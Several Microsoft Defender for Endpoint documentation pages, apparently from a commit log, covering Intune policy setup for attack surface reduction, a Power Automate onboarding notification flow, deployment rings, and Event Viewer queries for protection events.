- > :::image type="content" source="media/2055e4f9b9141525c0eb681e7ba19381.png" alt-text="The Microsoft Intune admin center15" lightbox="media/2055e4f9b9141525c0eb681e7ba19381.png":::
-
-7. Select groups to include, assign to your test group, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/48318a51adee06bff3908e8ad4944dc9.png" alt-text="The Microsoft Intune admin center16" lightbox="media/48318a51adee06bff3908e8ad4944dc9.png":::
-
-8. Review and create, then select **Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/dfdadab79112d61bd3693d957084b0ec.png" alt-text="The Microsoft Intune admin center17" lightbox="media/dfdadab79112d61bd3693d957084b0ec.png":::
-
-9. You see the configuration policy you created.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/38180219e632d6e4ec7bd25a46398da8.png" alt-text="The Microsoft Intune admin center18" lightbox="media/38180219e632d6e4ec7bd25a46398da8.png":::
-
-### Attack Surface Reduction - Attack surface reduction rules
-
-1. Open the Intune admin center.
-
-2. Navigate to **Endpoint security > Attack surface reduction**.
-
-3. Select **Create Policy**.
-
-4. Select **Platform - Windows 10 and Later - Profile - Attack surface reduction
- rules > Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/522d9bb4288dc9c1a957392b51384fdd.png" alt-text="The Microsoft Intune admin center19" lightbox="media/522d9bb4288dc9c1a957392b51384fdd.png":::
-
-5. Enter a name and description, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/a5a71fd73ec389f3cdce6d1a6bd1ff31.png" alt-text="The Microsoft Intune admin center20" lightbox="media/a5a71fd73ec389f3cdce6d1a6bd1ff31.png":::
-
-6. In the **Configuration settings page**: Set the configurations you require for Attack surface reduction rules, then select **Next**.
-
- > [!NOTE]
- > We will be configuring all of the Attack surface reduction rules to Audit.
- >
- > For more information, see [Attack surface reduction rules](attack-surface-reduction.md).
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/dd0c00efe615a64a4a368f54257777d0.png" alt-text="The Microsoft Intune admin center21" lightbox="media/dd0c00efe615a64a4a368f54257777d0.png":::
-
-7. Add Scope Tags as required, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/6daa8d347c98fe94a0d9c22797ff6f28.png" alt-text="The Microsoft Intune admin center22" lightbox="media/6daa8d347c98fe94a0d9c22797ff6f28.png":::
-
-8. Select groups to include and assign to test group, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/45cefc8e4e474321b4d47b4626346597.png" alt-text="The Microsoft Intune admin center23" lightbox="media/45cefc8e4e474321b4d47b4626346597.png":::
-
-9. Review the details, then select **Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/2c2e87c5fedc87eba17be0cdeffdb17f.png" alt-text="The Microsoft Intune admin center24" lightbox="media/2c2e87c5fedc87eba17be0cdeffdb17f.png":::
-
-10. View the policy.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/7a631d17cc42500dacad4e995823ffef.png" alt-text="The Microsoft Intune admin center25" lightbox="media/7a631d17cc42500dacad4e995823ffef.png":::
-
-### Attack Surface Reduction - Web Protection
-
-1. Open the Intune admin center.
-
-2. Navigate to **Endpoint security > Attack surface reduction**.
-
-3. Select **Create Policy**.
-
-4. Select **Windows 10 and Later - Web protection > Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/cd7b5a1cbc16cc05f878cdc99ba4c27f.png" alt-text="The Microsoft Intune admin center26" lightbox="media/cd7b5a1cbc16cc05f878cdc99ba4c27f.png":::
-
-5. Enter a name and description, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/5be573a60cd4fa56a86a6668b62dd808.png" alt-text="The Microsoft Intune admin center27" lightbox="media/5be573a60cd4fa56a86a6668b62dd808.png":::
-
-6. In the **Configuration settings page**: Set the configurations you require for
- Web Protection, then select **Next**.
-
- > [!NOTE]
- > We are configuring Web Protection to Block.
- >
- > For more information, see [Web Protection](web-protection-overview.md).
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/6104aa33a56fab750cf30ecabef9f5b6.png" alt-text="The Microsoft Intune admin center28" lightbox="media/6104aa33a56fab750cf30ecabef9f5b6.png":::
-
-7. Add **Scope Tags as required > Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/6daa8d347c98fe94a0d9c22797ff6f28.png" alt-text="The Microsoft Intune admin center29" lightbox="media/6daa8d347c98fe94a0d9c22797ff6f28.png":::
-
-8. Select **Assign to test group > Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/45cefc8e4e474321b4d47b4626346597.png" alt-text="The Microsoft Intune admin center30" lightbox="media/45cefc8e4e474321b4d47b4626346597.png":::
-
-9. Select **Review and Create > Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/8ee0405f1a96c23d2eb6f737f11c1ae5.png" alt-text="The Microsoft Intune admin center31" lightbox="media/8ee0405f1a96c23d2eb6f737f11c1ae5.png":::
-
-10. View the policy.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/e74f6f6c150d017a286e6ed3dffb7757.png" alt-text="The Microsoft Intune admin center32" lightbox="media/e74f6f6c150d017a286e6ed3dffb7757.png":::
-
-## Validate configuration settings
-
-### Confirm policies have been applied
-
-Once the Configuration policy has been assigned, it takes some time to apply.
-
-For information on timing, see [Intune configuration information](/mem/intune/configuration/device-profile-troubleshoot#how-long-does-it-take-for-devices-to-get-a-policy-profile-or-app-after-they-are-assigned).
-
-To confirm that the configuration policy is applied to your test device, follow the following process for each configuration policy.
-
-1. Open the Intune admin center and navigate to the relevant policy as shown in the
- preceding section. The following example shows the next generation protection settings.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Intune admin center33.](media/43ab6aa74471ee2977e154a4a5ef2d39.png)](media/43ab6aa74471ee2977e154a4a5ef2d39.png#lightbox)
-
-2. Select the **Configuration Policy** to view the policy status.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Intune admin center34.](media/55ecaca0e4a022f0e29d45aeed724e6c.png)](media/55ecaca0e4a022f0e29d45aeed724e6c.png#lightbox)
-
-3. Select **Device Status** to see the status.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Intune admin center35.](media/18a50df62cc38749000dbfb48e9a4c9b.png)](media/18a50df62cc38749000dbfb48e9a4c9b.png#lightbox)
-
-4. Select **User Status** to see the status.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Intune admin center36.](media/4e965749ff71178af8873bc91f9fe525.png)](media/4e965749ff71178af8873bc91f9fe525.png#lightbox)
-
-5. Select **Per-setting status** to see the status.
-
- > [!TIP]
- > This view is very useful to identify any settings that conflict with another policy.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Intune admin center37.](media/42acc69d0128ed09804010bdbdf0a43c.png)](media/42acc69d0128ed09804010bdbdf0a43c.png#lightbox)
-
-### Confirm endpoint detection and response
-
-1. Before applying the configuration, the Defender for Endpoint Protection service shouldn't be started.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Services panel1.](media/b418a232a12b3d0a65fc98248dbb0e31.png)](media/b418a232a12b3d0a65fc98248dbb0e31.png#lightbox)
-
-2. After the configuration is applied, the Defender for Endpoint Protection service should be started.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Services panel2.](media/a621b699899f1b41db211170074ea59e.png)](media/a621b699899f1b41db211170074ea59e.png#lightbox)
-
-3. After the services are running on the device, the device appears in Microsoft Defender portal.
-
- > [!div class="mx-imgBorder"]
- > [![Image of Microsoft Defender portal.](media/df0c64001b9219cfbd10f8f81a273190.png)](media/df0c64001b9219cfbd10f8f81a273190.png#lightbox)
-
-### Confirm next-generation protection
-
-1. Before applying the policy on a test device, you should be able to manually
- manage the settings as shown in the following image:
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/88efb4c3710493a53f2840c3eac3e3d3.png" alt-text="The settings page-1" lightbox="media/88efb4c3710493a53f2840c3eac3e3d3.png":::
-
-2. After the policy is applied, you shouldn't be able to manually manage
- the settings.
-
- > [!NOTE]
- > In the following image **Turn on cloud-delivered protection** and
- > **Turn on real-time protection** are being shown as managed.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/9341428b2d3164ca63d7d4eaa5cff642.png" alt-text="The settings page-2" lightbox="media/9341428b2d3164ca63d7d4eaa5cff642.png":::
-
-### Confirm Attack Surface Reduction - Attack surface reduction rules
-
-1. Before applying the policy on a test device, open a PowerShell Window and type `Get-MpPreference`.
-
-2. You should see the following lines with no content:
-
- > AttackSurfaceReductionOnlyExclusions:
- >
- > AttackSurfaceReductionRules_Actions:
- >
- > AttackSurfaceReductionRules_Ids:
-
- :::image type="content" source="media/cb0260d4b2636814e37eee427211fe71.png" alt-text="The command line-1" lightbox="media/cb0260d4b2636814e37eee427211fe71.png":::
-
-3. After applying the policy on a test device, open a PowerShell Windows and type `Get-MpPreference`.
-
-4. You should see the following lines with content, as shown in the following image:
-
- :::image type="content" source="media/619fb877791b1fc8bc7dfae1a579043d.png" alt-text="The command line-2" lightbox="media/619fb877791b1fc8bc7dfae1a579043d.png":::
-
-### Confirm Attack Surface Reduction - Web Protection
-
-1. On the test device, open a PowerShell Windows and type
- `(Get-MpPreference).EnableNetworkProtection`.
-
-2. This should respond with a 0 as shown in the following image:
-
- :::image type="content" source="media/196a8e194ac99d84221f405d0f684f8c.png" alt-text="The command line-3" lightbox="media/196a8e194ac99d84221f405d0f684f8c.png":::
-
-3. After applying the policy, open a PowerShell Windows and type
- `(Get-MpPreference).EnableNetworkProtection`.
-
-4. You should see a response with a 1 as shown in the following image:
-
- :::image type="content" source="media/c06fa3bbc2f70d59dfe1e106cd9a4683.png" alt-text="The command line-4" lightbox="media/c06fa3bbc2f70d59dfe1e106cd9a4683.png":::
-
security Onboarding Notification https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-notification.md
- Title: Create an onboarding or offboarding notification rule
-description: Get a notification when a local onboarding or offboarding script is used.
------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Create a notification rule when a local onboarding or offboarding script is used
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Create a notification rule so that when a local onboarding or offboarding script is used, you are notified.
-
-## Before you begin
-
-You need to have access to:
--- Power Automate (Per-user plan at a minimum). For more information, see [Power Automate pricing page](https://make.powerautomate.com/pricing/).-- Azure Table or SharePoint List or Library / SQL DB.-
-## Create the notification flow
-
-1. In [make.powerautomate.com](https://make.powerautomate.com/).
-
-2. Navigate to **My flows > New > Scheduled - from blank**.
-
- :::image type="content" source="media/new-flow.png" alt-text="The flow" lightbox="media/new-flow.png":::
--
-3. Build a scheduled flow.
- 1. Enter a flow name.
- 2. Specify the start and time.
- 3. Specify the frequency. For example, every 5 minutes.
-
- :::image type="content" source="media/build-flow.png" alt-text="The notification flow" lightbox="media/build-flow.png":::
-
-4. Select the + button to add a new action. The new action is an HTTP request to the Defender for Endpoint devices API. You can also replace it with the out-of-the-box **WDATP Connector** (action: **Machines - Get list of machines**).
-
- :::image type="content" source="media/recurrence-add.png" alt-text="The recurrence and add action" lightbox="media/recurrence-add.png":::
-
-5. Enter the following HTTP fields:
-
- - Method: **GET** as a value to get the list of devices.
- - URI: Enter `https://api.securitycenter.microsoft.com/api/machines`.
- - Authentication: Select **Active Directory OAuth**.
- - Tenant: Sign-in to https://portal.azure.com and navigate to **Microsoft Entra ID > App Registrations** and get the Tenant ID value.
- - Audience: `https://securitycenter.onmicrosoft.com/windowsatpservice\`
- - Client ID: Sign-in to https://portal.azure.com and navigate to **Microsoft Entra ID > App Registrations** and get the Client ID value.
- - Credential Type: Select **Secret**.
- - Secret: Sign-in to https://portal.azure.com and navigate to **Microsoft Entra ID > App Registrations** and get the Tenant ID value.
-
- :::image type="content" source="media/http-conditions.png" alt-text="The HTTP conditions" lightbox="media/http-conditions.png":::
-
-6. Add a new step by selecting **Add new action** then search for **Data Operations** and select
-**Parse JSON**.
-
- :::image type="content" source="media/data-operations.png" alt-text="The data operations entry" lightbox="media/data-operations.png":::
-
-7. Add Body in the **Content** field.
-
- :::image type="content" source="media/parse-json.png" alt-text="The parse JSON section" lightbox="media/parse-json.png":::
-
-8. Select the **Use sample payload to generate schema** link.
-
- :::image type="content" source="media/parse-json-schema.png" alt-text="The parse JSON with payload" lightbox="media/parse-json-schema.png":::
-
-9. Copy and paste the following JSON snippet:
-
- ```json
- {
- "type": "object",
- "properties": {
- "@@odata.context": {
- "type": "string"
- },
- "value": {
- "type": "array",
- "items": {
- "type": "object",
- "properties": {
- "id": {
- "type": "string"
- },
- "computerDnsName": {
- "type": "string"
- },
- "firstSeen": {
- "type": "string"
- },
- "lastSeen": {
- "type": "string"
- },
- "osPlatform": {
- "type": "string"
- },
- "osVersion": {},
- "lastIpAddress": {
- "type": "string"
- },
- "lastExternalIpAddress": {
- "type": "string"
- },
- "agentVersion": {
- "type": "string"
- },
- "osBuild": {
- "type": "integer"
- },
- "healthStatus": {
- "type": "string"
- },
- "riskScore": {
- "type": "string"
- },
- "exposureScore": {
- "type": "string"
- },
- "aadDeviceId": {},
- "machineTags": {
- "type": "array"
- }
- },
- "required": [
- "id",
- "computerDnsName",
- "firstSeen",
- "lastSeen",
- "osPlatform",
- "osVersion",
- "lastIpAddress",
- "lastExternalIpAddress",
- "agentVersion",
- "osBuild",
- "healthStatus",
- "rbacGroupId",
- "rbacGroupName",
- "riskScore",
- "exposureScore",
- "aadDeviceId",
- "machineTags"
- ]
- }
- }
- }
- }
-
- ```
-
-10. Extract the values from the JSON call and check if the onboarded devices is / are already registered at the SharePoint list as an example:
-
- - If yes, no notification is triggered
- - If no, will register the newly onboarded devices in the SharePoint list and a notification is sent to the Defender for Endpoint admin
-
- :::image type="content" source="media/flow-apply.png" alt-text="The application of the flow to each element" lightbox="media/flow-apply.png":::
-
- :::image type="content" source="media/apply-to-each.png" alt-text="The application of the flow to the Get items element" lightbox="media/apply-to-each.png":::
-
-11. Under **Condition**, add the following expression: "length(body('Get_items')?['value'])" and set the condition to equal to 0.
-
- :::image type="content" source="media/apply-to-each-value.png" alt-text="The application of the flow to each condition" lightbox="media/apply-to-each-value.png":::
- :::image type="content" source="media/conditions-2.png" alt-text="The condition-1" lightbox="media/conditions-2.png":::
- :::image type="content" source="media/condition3.png" alt-text="The condition-2" lightbox="media/condition3.png":::
- :::image type="content" source="media/send-email.png" alt-text="The Send an email section" lightbox="media/send-email.png":::
-
-## Alert notification
-
-The following image is an example of an email notification.
--
-## Tips
--- You can filter here using lastSeen only:
- - Every 60 min:
- - Take all devices last seen in the past seven days.
--- For each device:
- - If last seen property is on the one hour interval of [-7 days, -7days + 60 minutes] -> Alert for offboarding possibility.
- - If first seen is on the past hour -> Alert for onboarding.
-
-In this solution, you don't have duplicate alerts.
-
-There are tenants that have numerous devices. Getting all those devices might require paging.
-
-You can split it to two queries:
-
-1. For offboarding take only this interval using the OData $filter and only notify if the conditions are met.
-
-2. Take all devices last seen in the past hour and check first seen property for them (if the first seen property is on the past hour, the last seen must be there too).
--
security Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding.md
- Title: Onboard to Microsoft Defender for Endpoint
-description: Learn how to onboard endpoints to Microsoft Defender for Endpoint service.
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - m365-initiative-defender-endpoint
- - highpri
- - tier1
-- Previously updated : 04/03/2024--
-# Onboard to Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Onboard devices using any of the supported management tools
-
-The deployment tool you use influences how you onboard endpoints to the service.
-
-To start onboarding your devices:
-
-1. Go to [Select deployment method](../defender-endpoint/deployment-strategy.md#step-2-select-deployment-method).
-2. Choose the Operating System for the devices you wish to Onboard.
-3. Select the tool you plan to use.
-4. Follow the instructions to Onboard your devices.
-
-This video provides a quick overview of the onboarding process and the different tools and methods.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
-
-## Deploy using a ring-based approach
-
-### New deployments
-
-A ring-based approach is a method of identifying a set of endpoints to onboard and verifying that certain criteria are met before proceeding to deploy the service to a larger set of devices. You can define the exit criteria for each ring and ensure that they're satisfied before moving on to the next ring. Adopting a ring-based deployment helps reduce potential issues that could arise while rolling out the service.
-
-This table provides an example of the deployment rings you might use:
-
-|Deployment ring|Description|
-|||
-|Evaluate|Ring 1: Identify 50 devices to onboard to the service for testing.|
-|Pilot|Ring 2: Identify and onboard the next 50-100 endpoints in a production environment. Microsoft Defender for Endpoint supports various endpoints that you can onboard to the service, for more information, see [Select deployment method](deployment-strategy.md#step-2-select-deployment-method).|
-|Full deployment|Ring 3: Roll out service to the rest of environment in larger increments. For more information, see [Get started with your Microsoft Defender for Endpoint deployment](mde-planning-guide.md).
-
-### Exit criteria
-
-An example set of exit criteria for each ring can include:
--- Devices show up in the device inventory list-- Alerts appear in dashboard-- [Run a detection test](run-detection-test.md)-- [Run a simulated attack on a device](attack-simulations.md)-
-## Existing deployments
-
-### Windows endpoints
-
-For Windows and/or Windows Servers, you select several machines to test ahead of time (before patch Tuesday) by using the **Security Update Validation program (SUVP)**.
-
-For more information, see:
--- [What is the Security Update Validation Program](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/what-is-the-security-update-validation-program/ba-p/275767)-- [Software Update Validation Program and Microsoft Malware Protection Center Establishment - TwC Interactive Timeline Part 4](https://www.microsoft.com/security/blog/2012/03/28/software-update-validation-program-and-microsoft-malware-protection-center-establishment-twc-interactive-timeline-part-4/)-
-### Non-Windows endpoints
-
-With macOS and Linux, you could take a couple of systems and run in the Beta channel.
-
-> [!NOTE]
-> Ideally at least one security admin and one developer so that you are able to find compatibility, performance and reliability issues before the build makes it into the Current channel.
-
-The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in Beta are the first ones to receive updates and new features, followed later by Preview and lastly by Current.
--
-In order to preview new features and provide early feedback, it's recommended that you configure some devices in your enterprise to use either Beta or Preview.
-
-> [!WARNING]
-> Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
--
-## Example deployments
-
-To provide some guidance on your deployments, in this section we guide you through using two deployment tools to onboard endpoints.
-
-The tools in the example deployments are:
--- [Onboarding using Microsoft Configuration Manager](onboarding-endpoint-configuration-manager.md)-- [Onboarding using Microsoft Intune](onboarding-endpoint-manager.md)-
-For some additional information and guidance, check out the [PDF](https://download.microsoft.com/download/5/6/0/5609001f-b8ae-412f-89eb-643976f6b79c/mde-deployment-strategy.pdf) or [Visio](https://download.microsoft.com/download/5/6/0/5609001f-b8ae-412f-89eb-643976f6b79c/mde-deployment-strategy.vsdx) to see the various paths for deploying Defender for Endpoint.
-
-The example deployments will guide you on configuring some of the Defender for Endpoint capabilities, but you'll find more detailed information on configuring Defender for Endpoint capabilities in the [next step](#next-step).
-
-## Next step
-
-After onboarding the endpoints move on to the next step where you'll configure the various capabilities such as endpoint detection and response, next-generation protection, and attack surface reduction.
--- [Step 5 - Configure capabilities](onboard-configure.md)-
security Overview Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction.md
- Title: Understand and use attack surface reduction-
-description: Learn about the attack surface reduction capabilities of Microsoft Defender for Endpoint.
---------- m365-security-- tier2-- mde-asr Previously updated : 03/20/2024--
-# Understand and use attack surface reduction capabilities
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> [!TIP]
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Attack surfaces are all the places where your organization is vulnerable to cyberthreats and attacks. Defender for Endpoint includes several capabilities to help reduce your attack surfaces. Watch the following video to learn more about attack surface reduction.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4woug]
-
-## Configure attack surface reduction capabilities
-
-To configure attack surface reduction in your environment, follow these steps:
-
-1. [Enable hardware-based isolation for Microsoft Edge](/windows/security/threat-protection/microsoft-defender-application-guard/install-md-app-guard).
-
-2. [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment.md).
-
-3. Enable application control.
-
- 1. Review base policies in Windows. See [Example Base Policies](/windows/security/threat-protection/windows-defender-application-control/example-wdac-base-policies).
-
- 2. See the [Windows Defender Application Control design guide](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-design-guide).
-
- 3. Refer to [Deploying Windows Defender Application Control (WDAC) policies](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-deployment-guide).
-
-4. [Enable controlled folder access](enable-controlled-folders.md).
-
-5. Enable [removable storage protection](device-control-overview.md).
-
-6. [Turn on network protection](enable-network-protection.md).
-
-7. Enable [Web protection](web-protection-overview.md).
-
-8. [Enable exploit protection](enable-exploit-protection.md).
-
-9. Set up your network firewall.
-
- 1. Get an overview of [Windows Firewall with advanced security](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security).
-
- 2. Use the [Windows Firewall design guide](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security-design-guide) to decide how you want to design your firewall policies.
-
- 3. Use the [Windows Firewall deployment guide](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security-deployment-guide) to set up your organization's firewall with advanced security.
-
-> [!TIP]
-> In most cases, when you configure attack surface reduction capabilities, you can choose from among several methods:
->
-> - Microsoft Intune
-> - Microsoft Configuration Manager
-> - Group Policy
-> - PowerShell cmdlets
-
-## Test attack surface reduction in Microsoft Defender for Endpoint
-
-As part of your organization's security team, you can configure attack surface reduction capabilities to run in audit mode to see how they work. You can enable the following attack surface reduction security features in audit mode:
--- Attack surface reduction rules-- Exploit protection-- Network protection-- Controlled folder access-- Device control-
-Audit mode lets you see a record of what *would* have happened if the feature were enabled.
-
-You can enable audit mode when testing how the features work. Enabling audit mode only for testing helps to prevent audit mode from affecting your line-of-business apps. You can also get an idea of how many suspicious file modification attempts occur over a certain period of time.
-
-The features don't block or prevent apps, scripts, or files from being modified. However, the Windows Event Log records events as if the features were fully enabled. With audit mode, you can review the event log to see what effect the feature would have had if it was enabled.
-
-To find the audited entries, go to **Applications and Services** \> **Microsoft** \> **Windows** \> **Windows Defender** \> **Operational**.
-
-Use Defender for Endpoint to get greater details for each event. These details are especially helpful for investigating attack surface reduction rules. Using the Defender for Endpoint console lets you [investigate issues as part of the alert timeline and investigation scenarios](investigate-alerts.md).
-
-You can enable audit mode using Group Policy, PowerShell, and configuration service providers (CSPs).
-
-| Audit options | How to enable audit mode | How to view events |
-||||
-| Audit applies to all events | [Enable controlled folder access](enable-controlled-folders.md) | [Controlled folder access events](evaluate-controlled-folder-access.md#review-controlled-folder-access-events-in-windows-event-viewer) |
-| Audit applies to individual rules | [Step 1: Test attack surface reduction rules using Audit mode](attack-surface-reduction-rules-deployment-test.md#step-1-test-attack-surface-reduction-rules-using-audit) | [Step 2: Understand the Attack surface reduction rules reporting page](attack-surface-reduction-rules-deployment-test.md#step-2-understand-the-asr-rules-reporting-page-in-the-microsoft-365-defender-portal) |
-| Audit applies to all events | [Enable network protection](enable-network-protection.md) | [Network protection events](evaluate-network-protection.md#review-network-protection-events-in-windows-event-viewer) |
-| Audit applies to individual mitigations | [Enable exploit protection](enable-exploit-protection.md) | [Exploit protection events](exploit-protection.md#review-exploit-protection-events-in-windows-event-viewer) |
-
-For example, you can test attack surface reduction rules in audit mode before you enable them in block mode. Attack surface reduction rules are predefined to harden common, known attack surfaces. There are several methods you can use to implement attack surface reduction rules. The preferred method is documented in the following attack surface reduction rules deployment articles:
--- [Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)-- [Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)-- [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)-- [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)-- [Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)-
-## View attack surface reduction events
-
-Review attack surface reduction events in Event Viewer to monitor what rules or settings are working. You can also determine if any settings are too "noisy" or impacting your day to day workflow.
-
-Reviewing events is handy when you're evaluating the features. You can enable audit mode for features or settings, and then review what would have happened if they were fully enabled.
-
-This section lists all the events, their associated feature or setting, and describes how to create custom views to filter to specific events.
-
-Get detailed reporting into events, blocks, and warnings as part of Windows Security if you have an E5 subscription and use [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md).
-
-### Use custom views to review attack surface reduction capabilities
-
-Create custom views in the Windows Event Viewer to only see events for specific capabilities and settings. The easiest way is to import a custom view as an XML file. You can copy the XML directly from this page.
-
-You can also manually navigate to the event area that corresponds to the feature.
-
-#### Import an existing XML custom view
-
-1. Create an empty .txt file and copy the XML for the custom view you want to use into the .txt file. Do this for each of the custom views you want to use. Rename the files as follows (ensure you change the type from .txt to .xml):
-
- - Controlled folder access events custom view: *cfa-events.xml*
- - Exploit protection events custom view: *ep-events.xml*
- - Attack surface reduction events custom view: *asr-events.xml*
- - Network/ protection events custom view: *np-events.xml*
-
-2. Type **event viewer** in the Start menu and open **Event Viewer**.
-
-3. Select **Action** \> **Import Custom View...**
-
- > [!div class="mx-imgBorder"]
- > ![Animation highlighting Import custom view on the left of the Even viewer window.](media/events-import.gif)
-
-4. Navigate to where you extracted the XML file for the custom view you want and select it.
-
-5. Select **Open**.
-
-6. It creates a custom view that filters to only show the events related to that feature.
-
-#### Copy the XML directly
-
-1. Type **event viewer** in the Start menu and open the Windows **Event Viewer**.
-
-2. On the left panel, under **Actions**, select **Create Custom View...**
-
- > [!div class="mx-imgBorder"]
- > ![Animation highlighting the create custom view option on the Event viewer window.](media/events-create.gif)
-
-3. Go to the XML tab and select **Edit query manually**. You see a warning that you can't edit the query using the **Filter** tab if you use the XML option. Select **Yes**.
-
-4. Paste the XML code for the feature you want to filter events from into the XML section.
-
-5. Select **OK**. Specify a name for your filter. This action creates a custom view that filters to only show the events related to that feature.
-
-#### XML for attack surface reduction rule events
-
-```xml
-<QueryList>
- <Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
- <Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[(EventID=1121 or EventID=1122 or EventID=5007)]]</Select>
- <Select Path="Microsoft-Windows-Windows Defender/WHC">*[System[(EventID=1121 or EventID=1122 or EventID=5007)]]</Select>
- </Query>
-</QueryList>
-```
-
-#### XML for controlled folder access events
-
-```xml
-<QueryList>
- <Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
- <Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[(EventID=1123 or EventID=1124 or EventID=5007)]]</Select>
- <Select Path="Microsoft-Windows-Windows Defender/WHC">*[System[(EventID=1123 or EventID=1124 or EventID=5007)]]</Select>
- </Query>
-</QueryList>
-```
-
-#### XML for exploit protection events
-
-```xml
-<QueryList>
- <Query Id="0" Path="Microsoft-Windows-Security-Mitigations/KernelMode">
- <Select Path="Microsoft-Windows-Security-Mitigations/KernelMode">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Concurrency">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Contention">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
